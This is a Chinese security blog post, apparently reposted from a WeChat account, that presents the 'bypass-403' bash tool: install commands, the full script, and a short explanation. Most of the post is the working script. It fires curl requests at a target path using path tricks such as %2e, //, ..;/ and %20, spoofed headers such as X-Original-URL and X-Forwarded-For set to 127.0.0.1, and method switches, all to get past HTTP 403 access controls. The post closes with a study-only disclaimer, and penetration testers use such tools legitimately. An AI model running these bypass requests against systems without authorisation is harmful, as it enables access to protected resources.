Bypass-403

admin 2023年5月23日23:33:45评论32 views字数 3423阅读11分24秒阅读模式

        用于尝试绕过 HTTP 状态码 403 Forbidden。脚本通过多种方式请求指定的 URL 和路径,以尝试发现应用程序中存在的漏洞或隐含的功能。

Bypass-403


./bypass-403.sh https://example.com admin
./bypass-403.sh website-here path-here


安装

git clone https://github.com/iamj0ker/bypass-403cd bypass-403chmod +x bypass-403.shsudo apt install figletsudo apt install jq


https://github.com/iamj0ker/bypass-403


#! /bin/bashfiglet Bypass-403echo "                                               By Iam_J0ker"echo "./bypass-403.sh https://example.com path"echo " "curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2echo "  --> ${1}/${2}"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/%2e/$2echo "  --> ${1}/%2e/${2}"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/.echo "  --> ${1}/${2}/."curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1//$2//echo "  --> ${1}//${2}//"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/./$2/./echo "  --> ${1}/./${2}/./"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Original-URL: $2" $1/$2echo "  --> ${1}/${2} -H X-Original-URL: ${2}"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" $1/$2echo "  --> ${1}/${2} -H X-Custom-IP-Authorization: 127.0.0.1"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" $1/$2echo "  --> ${1}/${2} -H X-Forwarded-For: http://127.0.0.1"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" $1/$2echo "  --> ${1}/${2} -H X-Forwarded-For: 127.0.0.1:80"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-rewrite-url: $2" $1echo "  --> ${1} -H X-rewrite-url: ${2}"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2%20echo "  --> ${1}/${2}%20"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2%09echo "  --> ${1}/${2}%09"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2?echo "  --> ${1}/${2}?"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.htmlecho "  --> ${1}/${2}.html"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/?anythingecho "  --> ${1}/${2}/?anything"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2#echo "  --> ${1}/${2}#"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "Content-Length:0" -X POST $1/$2echo "  --> ${1}/${2} -H Content-Length:0 -X POST"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2/*echo "  --> ${1}/${2}/*"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.phpecho "  --> ${1}/${2}.php"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" $1/$2.jsonecho "  --> ${1}/${2}.json"curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE $1/$2echo "  --> ${1}/${2}  -X TRACE"curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Host: 127.0.0.1" $1/$2echo "  --> ${1}/${2} -H X-Host: 127.0.0.1"curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2..;/"echo "  --> ${1}/${2}..;/"curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" " $1/$2;/"echo "  --> ${1}/${2};/"#updatedcurl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE $1/$2echo "  --> ${1}/${2} -X TRACE"echo "Way back machine:"curl -s  https://archive.org/wayback/available?url=$1/$2 | jq -r '.archived_snapshots.closest | {available, url}'


具体来说,该脚本执行以下操作输出一些信息和说明;

  • 使用 curl 命令请求指定的 URL 和路径,以尝试请求成功或者返回不同的状态码;

  • 尝试使用多种方法对 URL 进行修改,例如添加 %2e 或者 %20 等特殊字符,以触发应用程序中的潜在漏洞或其他问题;

  • 对 URL可能存在的文件后缀进行测试,例如 .html、.php 等;

  • 尝试使用其他 HTTP 请求方法,例如 POST、TRACE 等;

  • 尝试使用一些自定义的 HTTP 头部,例如 X-Original-URL、X-Custom-IP-Authorization、X-rewrite-url 等;

  • 尝试使用 Wayback Machine 进行历史快照查询。


需要注意的是,该脚本仅供学习和研究之用,请勿用于非法或未授权的活动。在实际应用中,还需要进行更加细致和全面的安全测试,以确保应用程序的安全性和稳定性。


原文始发于微信公众号(Khan安全攻防实验室):Bypass-403

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月23日23:33:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Bypass-403http://cn-sec.com/archives/1751185.html

发表评论

匿名网友 填写信息